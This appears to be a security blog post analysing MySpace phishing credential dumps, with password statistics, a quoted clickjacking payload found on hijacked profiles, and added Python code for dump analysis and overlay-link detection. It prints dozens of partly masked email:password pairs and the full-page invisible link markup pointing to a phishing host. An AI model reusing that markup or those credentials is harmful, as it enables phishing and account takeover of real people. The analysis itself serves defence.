Abstract
Today I found an interesting article, Myspace phishing site discloses countless usernames and passwords, on SecuriTeam. Someone must have found the user/password combo file collected by a phisher. It is a collection of ~57’000 user/pass (actually email/pass) combos. Some of them will be fake, but anyway, I got interested in the whole story. After some research I found the original advisory on FullDisclosure (which by the way also includes the passdump). I also Googled around a bit and found 3 more files with the name “myspace.txt”. This short analysis is based on these 4 passdumps. I really like to play with real data 🙂
The files
| File | Size (bytes) | Lines | Unique lines | Comment |
|---|---|---|---|---|
| m0 | 1886347 | 56590 | 42575 | Original file from the advisory |
| m1 | 1405905 | 45325 | 43098 | found with Google |
| m2 | 1527730 | 48892 | 46664 | found with Google |
| m3 | 1527769 | 48900 | 46664 | found with Google |
People and phishing
Some people realized that they were being phished 🙂
fuck.off.seriousy:computergek you really really suck:fuckoffthisissomethingadickwoulddo youguyssuck@fuckoff.com:getalifeubastard fuckyou@fuckoff.com:diephisher lollol
Other people don’t. They actually try to log in many times (the number before each combo is the number of login attempts they made):
[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30
18 amandamyspace_email@xxxx.com:josh2202
18 blndygrl82@xxxxxx.com:luvyachris
18 dncrj629@xxxxxxxx.net:julie
18 dtonesuperstarr@xxxxxxxx.com:carla09
18 eathenallen@xxx.com:candisma3
18 haleytrash@xxxxxx.com:buttcrack.
18 iamtyler44@xxxxxx.com:tjh123
18 katyandjan@xxxxxxx.net:meeow1
18 latinagirlveronica@xxxxx.com:teddy123
18 molly_doglover@xx.com:1007404mkk
20 alicewang93@xxxxxxxxxx.com:puppies11
21 b_radschenk@xxxxx.com:ford08
21 gogirl55546@xxxxxx.com:emmakauf!
21 helenichero617@xxx.com:christian
21 larissapasifull@xxxxxxx.com:16188s
21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways
21 yellowducks4you@xxx.net:norton13
22 zjs1daddy@xxxxx.com:freeshit4me
23 jbacaphoto@xxxxxxxxx.net:tiger2
23 twisted_and_frayed@xxxxxx.com:danny12031986
24 cathysurmick@xxxx.com:travis13
24 rlsorey@xx.com:abc123
24 the_beast525@xxxx.com:zander1
24 typ.1985@xxxxxxx.com:Mikhail
27 amandapandapixie@xx.com:panda1
36 aaron.braesicke@xxxxxx.net:dragon1
40 prissykatie2@xxxxx.com:swimmer1
45 southpark1@xxxxxxx.com:ajizzle!
262
437 :
[system@nord myspace]#
Password quality
The 30 most used passwords from the original list m0:
[system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30
13 love123
13 michael1
13 password2
14 asshole
14 bitch
14 fuck you
14 iloveyou
14 jordan1
14 qwerty1
15 123456a
15 babygirl1
15 blink182
15 bubbles1
15 princess1
16 123abc
16 iloveyou2
17 123456
17 nicole1
18 football1
18 number1
21 password
22 i
24 fuckyou1
24 myspace1
28 iloveyou1
29 monkey1
34 fuckyou
56 abc123
75 password1
981
[system@nord myspace]#
Password length
But if we look at the 20-character passwords, you will see that these aren’t actually passwords:
duanne1105duanne1105
youreastupidjerkface
ieatshitforbreakfest
1andrewlennon@yahcgg
fishyp@sbcglobal.net
suck my dick, pricks
fuckinhackersgo2hell
nice try you asshole
ILLHACKYOURMOMSPUSSY
suckmycockits9inches
worthlesspieceofshit
m loged in you bitch
URADUMBFUKKHAKKERHAH
Coopsieee3Coopsieee3
u suck i aint stupid
heymrhackerurafaggot
fuck you hack wanker
jfduoa932p[1rguinfkl
kaykay1211loserific1
stfu and get a life.
this is fake dipshit
fuck you and yo mama
mind ya own business
youmustthinkimstupid
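The three analyses above (counting repeated submissions with `sort | uniq -c`, counting passwords over unique combos with `awk -F:`, and looking at password length) can be done in one script. The following is an added example, not code from the original post; it uses a constructed sample dump (`SAMPLE_DUMP`, no real credentials) and a parser that splits on the first `:` only, so a password that itself contains `:` is not truncated the way `awk -F: '{print $2}'` would truncate it. The `looks_like_message` heuristic is my own way of separating the 20-character "messages to the phisher" from real passwords.

```python
"""Analyse an email:password combo dump the way the post's shell pipelines do
(sort | uniq -c | sort -n, sort m0 | uniq | awk -F: ...), but with a parser
that keeps passwords containing ':' whole.  Added example, not from the
original post; SAMPLE_DUMP is constructed and contains no real credentials."""
from collections import Counter

# Constructed sample of what a phishing form's capture log looks like:
# one victim retrying three times, shared weak passwords, a password with
# colons, a message aimed at the phisher, a blank line, a bare ':' and an
# empty password.
SAMPLE_DUMP = """\
alice@example.com:password1
alice@example.com:password1
alice@example.com:password1
bob@example.com:abc123
carol@example.com:abc123
dave@example.com:pass:with:colons
eve@example.com:nice try you asshole

:
frank@example.com:password1
grace@example.com:
"""


def parse_dump(text):
    """Yield (email, password) pairs, one per line that has a separator.
    Split on the FIRST ':' only: awk -F: '{print $2}' would truncate
    'pass:with:colons' to 'pass'."""
    for line in text.splitlines():
        if ":" not in line:
            continue  # blank line or garbage without a separator
        email, password = line.split(":", 1)
        yield email, password


def file_stats(text):
    """The numbers in the post's file table: size in bytes, lines, unique lines."""
    lines = text.splitlines()
    return {"size": len(text.encode("utf-8")),
            "lines": len(lines),
            "unique": len(set(lines))}


def repeated_submissions(text, min_count=2):
    """Combos submitted more than once (sort | uniq -c | sort -n): victims who
    kept retrying the fake login, so the entry is almost certainly a real
    credential and the account needs a forced reset."""
    counts = Counter(parse_dump(text))
    return {combo: n for combo, n in counts.items() if n >= min_count}


def looks_like_message(password):
    """Heuristic for the 'not actually passwords' entries the post shows at
    length 20: empty, or long and containing spaces (sentences, not secrets)."""
    return password == "" or (len(password) >= 16 and " " in password)


def top_passwords(text, n=10, skip_messages=True):
    """Most common passwords over unique combos (the post runs `sort m0 | uniq`
    first, so one victim retrying 18 times does not count 18 times)."""
    unique = dict.fromkeys(parse_dump(text))  # dedupe, keep first-seen order
    counts = Counter(pw for _, pw in unique
                     if not (skip_messages and looks_like_message(pw)))
    return counts.most_common(n)


def length_histogram(text):
    """Password length -> count over unique combos; message-like entries show
    up as an outlier bucket, as in the post's 20-character column."""
    unique = dict.fromkeys(parse_dump(text))
    hist = Counter(len(pw) for _, pw in unique)
    return dict(sorted(hist.items()))


if __name__ == "__main__":
    print(file_stats(SAMPLE_DUMP))
    print(repeated_submissions(SAMPLE_DUMP))
    print(top_passwords(SAMPLE_DUMP, 5))
    print(length_histogram(SAMPLE_DUMP))
```

Run it on a real capture log in place of `SAMPLE_DUMP` and the repeated-submission list is the first thing a defender wants: those are the accounts whose owners typed a working password several times into the fake form.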
How the Phisher did it
- from Waldo
Hmm… Oh no, it is very easy, yes very easy, what he is doing. He left some traces on some of the “cracked” accounts. I was expecting somebody to comment earlier, since it has been a couple of hours since the initial post.
When you modify a profile you can add this to the data of the profile, you know, those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account 😛

```html
HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
<img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif"> </a>
<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="http://marcolano.com/login/">
<img style="border-width:0px;width:2024px; height:1768px;" src="http://x.myspace.com/images/clear.gif"> </a>
<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://www.../mov/cid_3277_f.mov" width="1" height="1">
```

As you might see, this creates a huge invisible link in the page in front of everything, so when you click on anything on the page, like a link or anything, it will take you to that phishing website, so people believe that the account expired and enter their user+pass. Now I believe that his message was a way to tell about a BUG in myspace that should filter that content and is not doing it. So… we are in fact not talking about a stupid phishing website, for those who still believe that.
Regards Waldo
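Waldo's point is that the profile filter should have rejected that markup. As an added example (not MySpace's filter and not Waldo's code), here is a small detector for exactly the pattern he describes: an `<a>` that is absolutely positioned at the page corner, points to a host outside the site, and wraps an image sized larger than the viewport. `SAMPLE_PROFILE` is a constructed, defanged copy of the quoted snippet with a placeholder domain; `TRUSTED_HOSTS` and `VIEWPORT` are assumptions a real deployment would set to its own values.

```python
"""Flag the 'invisible full-page link' trick quoted above: an <a> that is
absolutely positioned at the page corner, points off-site, and wraps an image
sized larger than the viewport.  Added example, not MySpace's filter and not
Waldo's code; SAMPLE_PROFILE is a constructed, defanged copy of the snippet
with a placeholder domain, and TRUSTED_HOSTS / VIEWPORT are assumptions."""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"myspace.com"}  # assumption: link targets that count as on-site
VIEWPORT = (1024, 768)           # assumption: an image at least this big covers the page


def parse_style(style):
    """'a: b; c: d' -> {'a': 'b', 'c': 'd'}, lower-cased and stripped."""
    out = {}
    for decl in (style or "").split(";"):
        if ":" in decl:
            prop, value = decl.split(":", 1)
            out[prop.strip().lower()] = value.strip().lower()
    return out


def px(value):
    """'2024px' -> 2024; anything unparsable counts as 0."""
    try:
        return int(value.replace("px", "").strip())
    except ValueError:
        return 0


def is_external(href):
    """True when the link leaves the trusted site (relative links stay on-site)."""
    host = (urlparse(href).hostname or "").lower()
    if not host:
        return False
    return not any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


class OverlayLinkDetector(HTMLParser):
    """Tracks whether we are inside a positioned, external <a>, and records any
    viewport-sized <img> found there."""

    def __init__(self):
        super().__init__()
        self.current_anchor = None  # href of the suspicious <a> we are inside
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            style = parse_style(a.get("style"))
            href = a.get("href", "")
            if style.get("position") == "absolute" and is_external(href):
                self.current_anchor = href
            else:
                self.current_anchor = None
        elif tag == "img" and self.current_anchor is not None:
            style = parse_style(a.get("style"))
            w, h = px(style.get("width", "0")), px(style.get("height", "0"))
            if w >= VIEWPORT[0] and h >= VIEWPORT[1]:
                self.findings.append(
                    {"href": self.current_anchor, "width": w, "height": h})

    def handle_endtag(self, tag):
        if tag == "a":
            self.current_anchor = None


def find_overlay_links(html):
    """Return one finding per external, absolutely positioned link that wraps a
    viewport-sized image."""
    detector = OverlayLinkDetector()
    detector.feed(html)
    detector.close()
    return detector.findings


# Constructed: the quoted snippet with the phishing host replaced by a
# placeholder, followed by a harmless on-site link for contrast.
SAMPLE_PROFILE = (
    'HOLA!!!!'
    '<a style="text-decoration:none;position: absolute;top:1px;left:1px;" '
    'href="http://phishing-host.invalid/login/"> '
    '<img style="border-width:0px;width:2024px; height:1768px;" '
    'src="http://x.myspace.com/images/clear.gif"> </a>'
    '<a href="http://profile.myspace.com/friends">'
    '<img style="width:100px;height:100px;" src="http://x.myspace.com/images/clear.gif"></a>'
)

if __name__ == "__main__":
    for finding in find_overlay_links(SAMPLE_PROFILE):
        print("overlay link ->", finding)
```

Detection is the easy half; the fix for the bug Waldo describes is to not accept `position: absolute` (or any positioning and oversized dimensions) in user-supplied inline styles at all, which removes the whole class rather than this one instance.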
- and KF enhances:
nameHREFTrack